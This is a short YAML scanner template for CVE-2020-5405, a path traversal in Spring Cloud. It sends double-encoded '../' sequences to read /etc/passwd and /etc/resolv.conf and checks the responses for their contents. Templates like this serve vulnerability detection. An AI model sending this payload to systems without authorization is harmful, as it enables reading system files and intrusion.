id: CVE-2020-5405 info: name: Spring Cloud Path Traversal risk: High params: - root: '{{.BaseURL}}' variables: - endpoint: | a/b/ requests: - method: GET url: >- {{.root}}/{{.endpoint}}%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/passwd headers: - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36 detections: - >- StatusCode() == 200 && RegexSearch("resBody", "root:[x*]:0:0:") - method: GET redirect: false url: >- {{.root}}/{{.endpoint}}%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/resolv.conf headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 detections: - >- StatusCode() == 200 && StringSearch("response", "This file is managed by man:systemd-resolved(8)") references: - https://www.cvebase.com/cve/2020/5405